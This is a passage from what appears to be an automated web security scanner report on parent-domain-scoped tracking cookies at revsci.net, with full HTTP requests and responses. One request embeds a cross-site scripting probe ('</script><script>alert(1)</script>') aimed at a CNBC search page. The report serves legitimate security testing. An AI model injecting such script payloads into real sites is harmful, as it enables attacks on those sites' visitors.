HI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; rtc_YxMN=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; rsiPus_Zj0S="MLsXtSMNJjhvJZE469KkOkhRwa7hUMAPxrf6hJozRd8Z+A+35M/kolpihGJj4u2iKbjeS1EvCK92NbndG2piitFk5yhzPh0Asprk/QPbdDEwiYGhrf99bXY2VOe9PIcfFRS2/TJRrsBbxPCqZATA815Vb6OrwpvJR+zQ8ZONw5NDFcDRM4Egsp+5lRO/RqTaWCvqLKdgLNNO+bHIOB/IBKfGTyn3x9hyQMgRTwTw/WZiyLCfxizuhAR+XyyKEfCcfaaAGJAnJqQZdmO1VmZpHdkEIVqVaW/bDRZw8cYnyECklaJvOF2wahK/u7Nzo4bp3wK/k9z0Yrm4mixaddiuIkw4udPKf/UogtY+mDmVDhhQ4prhkX4PPJDkOEdoWG1WEQkZ5R+to+XT3PP7INyzJX9UAcDswfaZQ/cKB8tEtjnIvsUN3l1/mp6SciYuyQRx9Al3e90IWOIkU2/kLyumZWwAnBJtXVZQ6MHNdOvQRn+tz8+u4mJZMHuowe6DCuo1BssszSI7fVSVkXNoqvI5ErmMEv1+U9VX8BZ7l1mJOEEYcNrwEIHTfZFh0VXeWcZ2W9poPXxIDPDBngth3QvvE77rIosn8oaBM0I6sPHriHPLNKl3s/B9LHYVpdkd3Wi6VWtgT6iQcUMU5RCx8+ebxQGaLSG0wQQ+8B4c8PoJTqlsU4ZTPoDQ9gq1qbp1fxQBE/duKMN/HIcAS6jiJA6u5jRJimo8+txavOqIAE9IG7oRtfOSHXFXvdh/QB5Y4KMfuS8+QD9KAPexYotOHZYx4HTY/HqZLocI7CdaBewn8g/UDLiMo6OSr2mrPa/vyD2EoPPVJlps9nzZRLKSBqevzcOmWADf+kMhecnNRPMgIoh+NU2sUuvyJTKBG9RUu7M9a9IcqRh0tW3Y5mWuZotrHq0vNX47iVAJI0Xlx1sPhYeLXCydroXvTN9dp3FcoFSFDVd5va4dSMaw7uS2qZld3DWlV5tpeUV2W3Qr12oXahUrt8/ekOJB31oKbMjTQ/+PElzayreVCpLkHTF9K/QBdRKh/Q3k5sgIIDBwFfIfEubP8z1F0X4KjeqlHHVhVC08/HcAzh3lp+L87xwXv12b3Gc7GJjw5puQDh8AF5dFLxgJByT4wiNK+3RBJ0+8Zno7Mj70ShXCPoDYJO9viSdA4vbhGDYrVnqNxu2qWcDS+zi2moahllNRK+brZPnynugQRPvjyE+Y60xVdWQIGp/c3DrzLKU245EtADE/BeE09F7uQnmFRG8pn4GEvK2JyEiScIFrmzYk09k8csnKw5pwYQVnO9a3xLuMRgjgYMV7Hl//0nkP82nOF3w8i/F1P00S+yk9nFVCLxzuqtDfk6dws3ffqw=="; rsi_us_1000000="pUMN4y+nMBYULQEQO7/+agzaymK59vZiJkFr2VpXgkC+Jr7XRUnyJCk8YM/Hg5qLS9hklPbtk1DrJekn2UyPAWyhMvaE93+A/EqNckNSZzSNKI4NlaS3lQc3Q4NfqNYPDoUcYENlNAGjsVCWufr4ExbfOjNdHiuM3eL7xfGwW4Rv+04e5eRHTByQ9gkvih/99PNVJg0MjSaTYbutzif0HMZEIpUgm+iFZVc73uuJ2rxrinsBIG3Wt4xzDqFArLXC7s29azBDzzCBInGdTqTd1PhCKdcK+CU51WYftLAb6VwVtnbF9EyB5Vp1g+XCjB0QI2GwcbKe+9KEl3jKCiMjN3k14zgswm4uqB97k78RIEAXL6kMQguxVmt59rl8bUbMEHiltuhaEHds27E2i02AyNvHEi2e2z5O+mSXFI8L/f1JR9mfd3yHb0Tu3dGdH+QGuWjI/M3ga0UH+uXCIKRoPwUXcd5Llnon2TewxkUnmdcIr3tF193QXrqVISMKLzxpzGsmT/ehH/aXvAKqFEPUThptHzt2tLwowGdrzCc399wWM6lsV1+/o6PJRMGeZo3OFodDI2cjGBrJTBJyT3nreFca+VR5Z3HjjKjWFbqVZybsn0ZYVB7LNEmgyiPfhzdRR6bWkjNJwozmOc3dtsB1Y/Om15Q7vMquF3JYj1sQLs+RhfBU4GqTUiKwQARrgp4i7uj1WoUKOtXQeaMxLYuK+Z6EPwy3OLEy+D9EqVq3/bLE6svjBGzKAQzOnLOgR/FJWzpTJKYrQuByi1kJICahjNh+sK7F9uFNParIk3qJosYR2M1h5gmiwt26uVxKxPCXzhSt8acvjbE9e0CNbd2ywq9ajeNG/8EsIdo1XRtcBY8juUWW6icPR3Taxs4hhNqKNuXaw2WfQc2FPpK6TTRYMbv/tjS2J9GxPBRtoBb2pmnjEA2c0L6Zih6GYCVWT2QdegbRFaICdC+l/vKzbHrKq0VGMBifZSmcJO4CPCjVY//F9DAa8+m3o+aWkBixpU7RYle8QBrG9MuE8/1fYyjJ+G/CtrBRFzYvfrmJjjQcZzs00z0WZxuhjS47hSaXZfWhziYSHbJjT8cUj1iBEjVX/AYSphUrlvAKXosmxJDysdlObM5LIHWtVNTuhHMcvKVhGXC2pdIG/Wgi19B3bm5mFqGJ6Bsl9rba5Kc47iSTgwrRvAyjLcPSUEMphnyJLdFf8NhJPWN3HBU2jOy3M4aEXtWhEoybYTvMtQCOa1NvTvL9ZcGD1fbxRhf2wFjvlBnjvwIYwtFkW80+fR+Oy7giTrb/VajkbleJ8ITAKYHNJl2GBzuItIQioCZoVtHUxlb/MVNpen6aWs3zfBfnL6FcjxYnZbyXsDhfZTgYPp40+EUFlNkROWz4ZE9qPj16OJLaVuLdjXSfqlbYADViNXvwuyDJ9sd/rAVIa9UQUQZgo4nO/R9H9myEBOgzxaRd3EyIlv0JVPWui12vquSDoJkHkj/YJ3BST6YNVAcDXnEXzIBa3IAst6Kvb2zfF8VpwPFUyz8KzuXDHtcugSUzgpVUIfBmksylXzod3OXBf8WjLTl3AdbjR/i3NVfDl4va/HIGh0HYPpWwVDZpzy2TZ9FZlQ0Cq1SYOTPoC//hXMtSnDNf44pzNvN7O0g3uMGSC+ssImmlLopdqrTi+BXl00rViEx70LECtqwSsCx4L0BhXTN8SIdR23JH2mExeba5rLdOYAA2rHrSX1KotK5izgobqkzCV0Bb/RoJ21dHPAzxwpXhHzcLzG8yG2g3zx4R8pN9JrIRzg=="; rsi_segs_1000000=pUPF5EOheXIQT7uItGF29/woLigEF+ZbSMKCT2sir9v5vw/ZUuJEqMB5SuHqPlIcMQ/w6XdX6zWuEUaXfqbTAIvGV2fYtsNz7Ao3U4T4c828xyLWWNlcMSklFjL3lv1heOLinphznJw8dBFO3JF3yN9vb0m/8bTuP9RZeo5cAYNGcn0yl1usM3mtUMs0l69Mbz4bxF3YoWu0Uqtj547OJO9XniqjHYgyt5UdzWCgiTmgIdz/cJLToegkozS+b6sYF8HShYIjecdIQm2Jh600+l09rXwXl7KXIogFmw8aSvkZGw0a1Sck3WHb+AAE2FhEgJN0G0wQU2baIPF65woOVVdq2UiKX+duZy5hsdVd9zy5ryjraQSHQu73gNLvF6PA6CtKIxTcw2SZYvzkhcui3nqjBg15+hmmR3evVUr056S/47nrbGICAfundTQkm5o1kGHtVdFS17URtes0ELi3vIO3iWmFjFXmCaHhvVtJjEns+wXUSVXhJwK1OS6MZHa5QlJscF+jyxIf4aOf9N4iUbqfGDRPH07xsqBc2sU/x0cyCK7dWoSF6hUi8ZRCWCNPsMp1uMtsXQDACFWdXFa1uUKyRisR2pFsS37XyCsCh3Dkuz/+fDPPTTzjK9NQiwexv8Afv5A2yjyB5WMjVBFvEu9DV7sSwQ==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOheXIQT7uItGF29/yo/tk8g7ZPQm8locHc+gQ4O3XY0n+Y1R9p5LQR/PIErQWNBrf/GhmELDb2SBYVi45leib6f+TcjX1aW0zQ/r0ApwP/UaVQAaikEpJEADFgWdDtKIlXFv4PL1BUaJzrH2RPUn/Xqe14cyhPjKhpKHCwKDiLN7ZpoTqEYsuFKvRBu2IqoSVy/5t1vlVo6PLHFjL00+ehAJFHV+aNKdWI3SWQJ9zzYJE3gOggYzS8l60cF0fRhYKZWqkcWW0BvbeT4FW1ruM8/GaXYHlxlcxlY1dHYTAJwSnBh56YsGo3OpM23g4Sg+W/5oOiiW7+as1QctRnSvvKtemWe1VHWAyJahT35bdZIwQmvQ48CkKLsbsrvtD5EoRz6nG/LcmuBS3Jn3/zoEOEBUzi69M6mTC+PEWZWQJbfRE+E5WVIp3Thw4yJ3cPPTklIFmWHjNjV1LLysLDkP3dWz0uKtSZgBTjHRQMRMICkT3e3WvYJStMWuk4t/bgY81r+yolKvpVebOAG0riueU6NKA2RTHy2dC6z8wrqYdn7xOgfCW63/UTu+4l45BNmrY1KteHuYcz51soyYLRWIiYVYTrR805k+41339fakhMofXoGz0fn+gFNr+iRy9hrLmSSF+HDB+jhnxcvr17NN0=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 14:29:32 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 14:29:31 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.199. http://pix04.revsci.net/I10985/b3/0/3/1008211/837302366.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/837302366.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPFJ0+FaAIQl6mdYdLQRDvQQIIfUaKpRumaNZVoy5fLC+2anZFaFgF267p/sMT/w0fq9nnd1ZKAKAstSPo/aEd6q4lAXSF3WmnEkpdYruGHMjvmSx9xmhjg/+yIQiaZrxZTjB2pDX4GX/0psICOo+aXU2cRcddt7VWVQyitLgFReN/nXTL1eZurE1gjxVE5suSHhqnXdvSs7dZURLQhFpbCz2JK8m0ta/8G7qQlOqxnpHs0TyS3sLVa+5yFqxAy5GG99X9vXMqDdt2rPIkDetgBkk6SJ3/CzKQBQVfDwmOJ7w==; Domain=.revsci.net; Expires=Sat, 16-Jun-2012 10:12:11 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/837302366.js?D=DM_LOC%3Dhttp%253A%252F%252Fsearch.cnbc.com%252Fmain.do%253Ftarget%253Dall%2526keywords%253Dxss3a34b%25253C%252Fscript%25253E%25253Cscript%25253Ealert(1)%25253C%252Fscript%25253E7c5fa54ba36cca68%2526categories%253Dexclude%2526searchboxinput%253Dxss%2526_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.fakereferrerdominator.com%252FreferrerPathName%253FRefParName%253DRefValue%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss3a34b%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E7c5fa54ba36cca68&categories=exclude&searchboxinput=xss
Cookie: NETID01=529777297210b0ea0bebf89fb75e37bd; NETSEGS_K05540=d303c7ec11fd6a67&K05540&0&4e0bd851&0&&4de5e0dc&b4e1d2b1d00ab5a43b3cb0c8a26d04a4; NETSEGS_F10933=d303c7ec11fd6a67&F10933&0&4e0bdb5a&0&&4de5f240&b4e1d2b1d00ab5a43b3cb0c8a26d04a4; rtc_oeWp=MLsvr9EvsT9n5xAcp61USLbh0Yvf9FBmafEhRPlfI5p+mTDWyPYYOo1ec4SdcT/xZD9oHkFrXiYO5u8ddTWrZA0alBeqme/BMnwWP7fBagJ7LAm9GzihniUHpxRSDbtE/y4Dn6r3O6v/mriQ+Obigzb9LmofjydaggTJhz5gnR8EipwELzPSikU870mspBI3+IEgddJ7G/b+/Mx2T+SF9oSWifT9ptBAt/fQNWI3RCPJdkNUsfQve23xV4XhnXe3e6I/WJUEg1+hF9UZbVMmpJmffW1c12Jo61EcVbf50khu/tDmsD+sRQJqKmNqrLB5rmQIs2u5wqoWMox7JNV8IT2g/I16SmUiMg==; rsi_segs_1000000=pUPNJ0mFqAIQl6mdYdLQRDvQQILXrtfItScDGwGQJYckjX9gbYsjARKcvhOUaU7WqumGZcdJhzO6cubBQHtewMZ47+cfbCl2Ak7d8/pokM2MDzpPhhTGMkjGYOeFHs8eVfQttPyNlOfIMoknXdQFIRsk0VhJB8oRU59hMGXSrrqYV/aQ+4vV+YH+CV8sqRMjak/xbIqdWM6wOpeZLxXy/sIWKEFN8Bk2dzTTCFQ9V2S8eMYg8Z3WuIie2OX4EN7efY7KXQwDLnOnwLuzf0ojQ7ZmUR/2NXX6HoJ5e6V93uqJzQ==; rsiPus_ZmGk="MLtHpFMtMD5nIIHwZj0oHVRtY1ej8tc6zznyeKlXjHLsTQzD4xUW6HRwT+1kiTVh5ivsL7k3aUkNsiQot/YiT2HPSuHjYI3t+XSfl3r6l+oSX7N3+fc2Loa/1sCDL7S+EQO1OkOu/Y+DCF1E/bCQ2fTjaxzmRt9nxV9WK+/amgC0n5gkbfHR3mEK8mJskWoqcYiLHGeXG313WAFULKCzkC5nDkh2aLM5XTCUsbQcWSGFXGq92dlw13mBbMO07wO0j54xaVnV2W2Wsf1Y4NMhqjCbKilLjMBrb7oztSmZyAV8mNTnAqni+xttCmy20pqNEE83KGTrrOvx5KVc/3A0SC3TbxbXVI7dxNJVuiwqB9sJCBe2VkvSQ8keWH9cMWMNH+dDLDrV7bF9/PqN6xrM89O1pM0ZjGT3lKeSIlcWTl+PezsyT4c="; rsi_us_1000000="pUMdJE+jPwoU1E3i9LCP6bG6xQfjg4/Fhn8qcnwvFdSmAJHUJt4Ro0tImj5kboo0u0DEHLOR+UdV+Vou2wH9qDq1DOMZ6zSB8TatxcnxZJeP2si5+6RdLvhB7EnDb0rL+VIwp6DCGq4B9bMTjOPAeDP+tbG0HoWOwY3nwxWJ4jBuo82FNpLlVntrAdC+TKIW02uKrqWH5ukkWxGZt4ECjPO9INkduNvEODV+aBfzawuNjhOPTFoy6sdDVz7dGEcjvwE6kDQq8sM68t++j082oHyQIjnR0EUiyGL/jXixKUiM6M8y5zsVM/01yh7qiwLDoHdGcsOtx7FgrFEnU3bpNccPTJRnzIV5ZEjxyV6cFkDugwd+t5OhfR3nIBSuqXKmzCKr+C4KDWd2CadyJcNAhKcZy1Rvc8qYkCSM0yDkpqL8kZu3vtODn8y1vlZHYWEaCyD7cDz4SDTzxmk8cHbAPbBkndHavYbg8QztY2y6uMP4RoUnqZ6vhlxSGF45XQWVs3G1ph5STi9ode2I9UKvCwpNCcorWKk3KbgJ7iQ8H6pp34vRJJ4dVoCtzU53y7V14Qp12WirD4bOGLDDDCvOtZybzSvOS6dumepl/CdQAu6qXJSPsTk52SSqGZBdCdpfpgCFZqPxqmqs/jQvophHBwOfFqHkgeJcU4WsYpko37GvNiyjfItO9XIvwbmQi9fWt9uqs1SMTApBPnXdT4WUTmNbdoE7MKjZrDPNnDuzhj8BQ5KtLMOH+7g4wNd2MQhyTjmnUm82lO087maVyBfuPx9S5VFrVUTDy0kmMRbC51jnaD2d6xTDOG4DSqIBSHqdED/u7r4TfqMTGSQiPCXrGhdIz0lJ9PO5SzLWFz7F8A03f7/SmHF9/TA0sNNWKcCB2S1eDXCMs3c0wtHpZROKjigLoonuMue49C1lz/aWBNd8yvoryCQJJMBlauNmFM8ICUeRpixk7FOtr1Do5g=="; udm_0=MLv/NFMJbipn3o+84l+pDdRQVORBRjEuxSmA7s15kGewdElyr/35ImZg3+kFSJQVGkEWEwhdDnZzfDE6nSd1WztndEk/TwQn+ElrbgPpaPVMhZJlMmEkZU3OG00DTAr++/uWE4rp2Bz/1qUbY70aWYu++sQb9OX1abiU4oQkLV4H77ItbNdqWKyiv1A8SA9uSE7PG4wtc/1q2/5TPeGjjUmL0/v13AfQZPr53LBa06DP3vHUUf+c25mah1jOCt8jEH8T5BaxT1MomGdaDj8W0lJLTjAuU2hy15xSbvJiIeti42X7wNiGKg8c/veiuJjF8l7fCxXgcWmuB4y10I6gqgTzFfVRH9YrSJ3mTPhD1PlYZHsDlPhnBi1hgjej8SrR8Gx3i5a8Xrx5UG7bJumwEumGEYAcpusZpAz2e0xc8HebR6OeEkl2NnWAtqx/mAoEB5KXjihUGmEieQVOXw/1vjZsRk5N2oTPCRnCU9mgz75l6wg4N0xq1Ckejpv0lrLuJ0G8Ty5FILpGrYZkjQ0sFoSYzAV6b6IP2LIkJg8GLdya33UjBNj2UM47laItOeyfnLFLYPD5ZE8iC2C+PzKYIJoUT/bbQ1EDpLVNGD0kf19m9PEYEYyYAGrhFUgIoJHsWAFTFHsrgS/o5WETeomssMnH7H907/ddBBaFCsbNZB6yM4D9wZlT0nFQtjQoM13oGZZeLfEXtJY1iN4AxS4Elwb+Iu9QG0dXcFClGkxG+ZJx+rL4y7yRYRXwu1CDn5PVWVpMOC6r022PGSVXCV3ywro5LijFJUuMKe5TkGnopnvTeD1IQ/DDZThrO1gWsna5GBCXyQ4VTsBB40bT/xAXTWgIvizuY5iCGk00A5DacVr8ObaWui72gIE9/jGHygBv8AIUTos37C79clCQ8DNqj/xKt5Z+5VpVC6XTXS/SMTxa/E1dOiY/sFRwW6J36hfqAgg/Lxjd17qGOgA/SFIQ2qjEYikSSDnmvztI69i5pCZqVdJ1dwniH4P0B6M+CxS9uR1YG4BTNCQbCyZZs5SVn/xOTs58rWz5tJE9gOypHiqqpdsZ0n4u/YE+ohXaN+rqev74JokV+JyfBKHZaXlJZxBZRwOvm5QZxfvBjGysFjjPeK6j3yzM6bc+sVeYbSLRq7Gl/9pktpi+M4glq0tmh1fBNE4egIw/CMyYJWbBo9yGOzWxT/MkAMK2UV1hMzG3DaM6jVKiLpU2IEiwvZORhpG11TCatIMNsbZI0MhOMzYZFw==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFJ0+FaAIQl6mdYdLQRDvQQIIfUaKpRumaNZVoy5fLC+2anZFaFgF267p/sMT/w0fq9nnd1ZKAKAstSPo/aEd6q4lAXSF3WmnEkpdYruGHMjvmSx9xmhjg/+yIQiaZrxZTjB2pDX4GX/0psICOo+aXU2cRcddt7VWVQyitLgFReN/nXTL1eZurE1gjxVE5suSHhqnXdvSs7dZURLQhFpbCz2JK8m0ta/8G7qQlOqxnpHs0TyS3sLVa+5yFqxAy5GG99X9vXMqDdt2rPIkDetgBkk6SJ3/CzKQBQVfDwmOJ7w==; Domain=.revsci.net; Expires=Sat, 16-Jun-2012 10:12:11 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Fri, 17 Jun 2011 10:12:11 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.200. http://pix04.revsci.net/I10985/b3/0/3/1008211/851863014.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/851863014.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47hsEu65JwcLNTCDRfrnhu4IU3vheM/Ns0vAjloMpK61ewu3QAx3uKzb2aFbWjI69eif+fODfjX2iW0zQnr2ApwL/IaWQAWmnFp61mTBgWbeLLplHNs08LFzYabwcAaYOpnwILBLA0IVDPkkGA4cG8987iuBlXl4yixD++rOGTsZv2eIAi6/tStrKkyKC/JXks5vOAC9GNAaNN9SIPSSgIVwuLxxEDZFtogZob6stUpVF0bF5RnkJXewaqSRMWqhntmKPHS7fwBMYESD1jsZuIh+afeGY/a+MmkAbSj6BxvAnX3PBxUJB08WfZWzRHSxSjL0s1nQn1aBhcdXO7MEbvH29Jbh9pz9psldaXNjS8nNO0nRaEioGGyf0mdW2GmFF3uqepO/hUq5hXY+RVEvbn1mH27KkDH58TGmNbI6JzmG3Q6GGoKtfyZ40FhOEsB1ykXVT/0VlHeufK0QtN+TBo1efXnXmzm8dtxJLmJeO0ZLOHVbzTTtO16Tur2LMvMzRS+5ImgOMLPdOW9Wn/gqImudjUr0507hjojcVEeBpMjdx1AfR/zyoc3NAePEy2cUAH4tO2pCz/7zt3aok6y67TthGh+zGb8FwVSP4OwJX4zAkzKYNj3o3tUIP6c5evz0uNNg=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 14:14:02 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/851863014.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; 